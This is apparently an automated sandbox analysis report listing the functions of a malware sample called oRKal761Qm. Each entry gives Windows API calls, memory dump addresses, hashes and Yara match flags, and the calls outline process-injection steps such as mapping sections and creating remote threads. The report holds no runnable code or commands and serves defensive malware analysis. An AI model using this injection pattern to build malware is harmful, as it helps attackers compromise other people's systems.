Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0042399E
DeleteVolumeMountPointW.KERNEL32(00000000), ref: 004239A5
GetCommandLineA.KERNEL32 ref: 004239AB
lstrcatW.KERNEL32(?,00000000), ref: 004239D0
InterlockedExchange.KERNEL32(?,00000000), ref: 004239DC
GetActiveWindow.USER32 ref: 004239E2
RtlTryEnterCriticalSection.NTDLL(?), ref: 004239ED
WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00423A03
IntersectRect.USER32(?,?,00000000), ref: 00423A14
DebugActiveProcessStop.KERNEL32(00000000), ref: 00423A1B
GetAtomNameW.KERNEL32(00000000,00000000,00000000), ref: 00423A24
GlobalDeleteAtom.KERNEL32(00000000), ref: 00423A2B
GetTimeZoneInformation.KERNEL32(?), ref: 00423A39
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00423A41
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00423A62
DebugBreak.KERNEL32 ref: 00423A68
EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00423A71
SetCommMask.KERNELBASE(00000000,00000000), ref: 00423AA2
GetTickCount.KERNEL32 ref: 00423AA8
GetSystemTimes.KERNELBASE(?,?,?), ref: 00423ABD
FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00423AE3
OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00423B05
CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00423B0E
FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00423B22
GlobalAlloc.KERNELBASE(00000000), ref: 00423BA0
LoadLibraryA.KERNELBASE(004284C0), ref: 00423BE3

Strings

}$, xrefs: 00423C07
VirtualProtect, xrefs: 00423B55, 00423B5A, 00423B73

Memory Dump Source

Source File: 00000000.00000002.1868568298.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_416000_oRKal761Qm.jbxd

Similarity

API ID: ActiveAtomCommDebugDeleteGlobalNameTimerWaitable$AllocBreakCommandComputerConfigConsoleCountCreateCriticalDateDefaultDriveEnterEnumExchangeFoldFormatFormatsInformationInterlockedIntersectLibraryLineLoadLogicalMaskMessageMountOpenPointProcessRectSectionStopStringStringsSystemTickTimeTimesVolumeWindowWriteZonelstrcat
String ID: VirtualProtect$}$
API String ID: 640544185-3575559497
Opcode ID: c76a4da30d26f9753a4a6e26cc0a53690939db44dd39906d20c4878ff509fdf9
Instruction ID: 651746614786403ae795aaf106f979abae7fecea218118d0f79c0c36b77b1f99
Opcode Fuzzy Hash: c76a4da30d26f9753a4a6e26cc0a53690939db44dd39906d20c4878ff509fdf9
Instruction Fuzzy Hash: 25719272606530AFC221AF61EC4DD9F3B6CEF46355B80043AF58592161DB3C5646CBAE

Function 00401513 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25

Function 0040151E Relevance: 10.7, APIs: 7, Instructions: 178
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24

Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24

Function 00402FD3 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403107
NtTerminateProcess.NTDLL ref: 00403120

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9

Function 00403149 Relevance: 3.1, APIs: 2, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F

Function 005CDBB1 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005CDBD9
Module32First.KERNEL32(00000000,00000224), ref: 005CDBF9

Memory Dump Source

Source File: 00000000.00000002.1868841024.00000000005CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 005CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ca000_oRKal761Qm.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 2c8b2c377b0d32e79d378c60d4268a730533eb220962aacd0b33728a91ec52fb
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 55F049362007156FD7202AE9A88DF6ABAF8BF49768F11053DF646D14C0DAB4EC458A61

Function 0059003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0059024D

Strings

kernel32.dll, xrefs: 0059008F, 00590095
cess, xrefs: 0059018D

Memory Dump Source

Source File: 00000000.00000002.1868741876.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_oRKal761Qm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: ee1f59e171199e66384d2c262f1c3237e2b828330c4cc9c82fb2229d09321594
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 59526974A01229DFDB64CF58C984BA8BBB1BF09314F1484D9E94DAB391DB30AE85DF14

Function 00590E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00590223,?,?), ref: 00590E19
SetErrorMode.KERNELBASE(00000000,?,?,00590223,?,?), ref: 00590E1E

Memory Dump Source

Source File: 00000000.00000002.1868741876.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_oRKal761Qm.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 2dbcecf0c0626295ca98ca82eb20a54c631a5170114456e30b6737547de97a18
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 94D0123514512877DB002A94DC09BCD7F1CDF05B62F008411FB0DD9080C770994046E5

Function 00423614 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00000040,?,?,?,00423BF3), ref: 0042362A

Memory Dump Source

Source File: 00000000.00000002.1868568298.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_416000_oRKal761Qm.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9dbbffbc3c54b5c3a63e2c751ae658eddfc00eafb6b082af4fefa63f7fa846a4
Instruction ID: cd11079ae9fe1b66df236ae7ddbd13e2ea7dadf25881c3163ba94d66086d63c1
Opcode Fuzzy Hash: 9dbbffbc3c54b5c3a63e2c751ae658eddfc00eafb6b082af4fefa63f7fa846a4
Instruction Fuzzy Hash: 5CC08CB1140109FFCF018B81EC06E593BADE300308F001131B701A1070C271AA21AB1D

Function 0040192A Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F

Function 004018FA Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F

Function 00401906 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F

Function 00401937 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B

Function 00401926 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F

Function 005CD870 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005CD8C1

Memory Dump Source

Source File: 00000000.00000002.1868841024.00000000005CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 005CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ca000_oRKal761Qm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: bbf73e7d953df0e352b79b5b00d60107e1f2f1b7a65f831d5fa3ea819ac33d3e
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: CC112B79A00208EFDB01DF98C989E98BFF5AF08351F0580A4F9489B362D771EA50DF90

Function 0040191E Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F

Non-executed Functions

Function 0059092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0059095F
l, xrefs: 00590966
GetProcAddress., xrefs: 005909DC, 005909DF, 005909E4

Memory Dump Source

Source File: 00000000.00000002.1868741876.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_oRKal761Qm.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: a3d99042c4777829df1b3507906a4eeac72b683ae48dc583899a027565d3a2a7
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: F3316AB6900609DFDF10CF99C884AAEBBF9FF48324F24544AD841AB351D771EA45CBA4

Function 00403303 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

s, xrefs: 00403351

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID:
String ID: s
API String ID: 0-453955339
Opcode ID: da7a5db41c3f246a621d8fe55a4e55c2a39458e9de173222b2c62c3251bbb34f
Instruction ID: f07d34ed0758ac91b8d2632d8a47cd6d3431bd61a55bc245d4c5613de815ccc4
Opcode Fuzzy Hash: da7a5db41c3f246a621d8fe55a4e55c2a39458e9de173222b2c62c3251bbb34f
Instruction Fuzzy Hash: B731776251C6C19FC3170F654825A667F685A43302B2900FFC442BE2E3D63D8B06939F

Function 004020E7 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

j1, xrefs: 004020EB

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID:
String ID: j1
API String ID: 0-4002328062
Opcode ID: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
Instruction ID: 7ffeeb59c018ebe80191c9150d7c44a1840aee0603b3a4286ce7f0937f8dfb2f
Opcode Fuzzy Hash: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
Instruction Fuzzy Hash: 1EF0287808838899CB02AF36C755B99FF31BF87335F78469ED9962A392C6200649C760

Function 004020B8 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
Instruction ID: 0881589c7ff5ff5768f2d8d6c75c742b5463282b0ed343a47442533531e174b2
Opcode Fuzzy Hash: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
Instruction Fuzzy Hash: 1D110A3A449345D9C60155278B4AB6BFB707A53730B308667D257267E18979028AE337

Function 005CD48E Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1868841024.00000000005CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 005CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ca000_oRKal761Qm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 0b3300c049f66f3187a0eef614ecc3a67b0b5127053aaf815682ae7cbc04aedd
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 3D1133723401019FDB54DE95DCC5FA677EAFB89320B198069E908CB355E675E841C760

Function 004020B6 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
Instruction ID: 5e4278b07ce3c8393ea1c67bbc9533801249a46e55f2d55876e4d3ceabbd52a2
Opcode Fuzzy Hash: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
Instruction Fuzzy Hash: 3F016174049348D9D7016A36DB4DBA7BB21BB43320F30826BD707352C2C9B4054BE367

Function 004020C4 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
Instruction ID: 5e560d39f8138ce68ee94cfd6023eaf6832ac934b81d0532f16e67c5e36192ac
Opcode Fuzzy Hash: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
Instruction Fuzzy Hash: 80018E340493848ECB029B35C71A7A9FF71BF93335F34819FC5571A6E2C6240209D751

Function 00590D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1868741876.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_oRKal761Qm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 894b21f823eebf797b90a5335aa433aaa4e84d6566b7ec04a8ca23f6749d8971
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 8701D676A006048FDF21DF64C804BAB37F9FB86316F4548B5D90AD72C2E774A941CB90

Function 004020E3 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
Instruction ID: fce5d5c764085920edf89c5c9efb60a7985776bdb309a80537f9fa9cbbd5f206
Opcode Fuzzy Hash: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
Instruction Fuzzy Hash: 5DF04E7408834499DB416A36C7457A9FB21BF83320F34825FD547256D2CA74054AE711

Function 004020FC Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1868540879.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oRKal761Qm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
Instruction ID: 9ff9efdcd1480cc8040ea01fdd64be9b4a39a154ba86f8cede482a75e84e4065
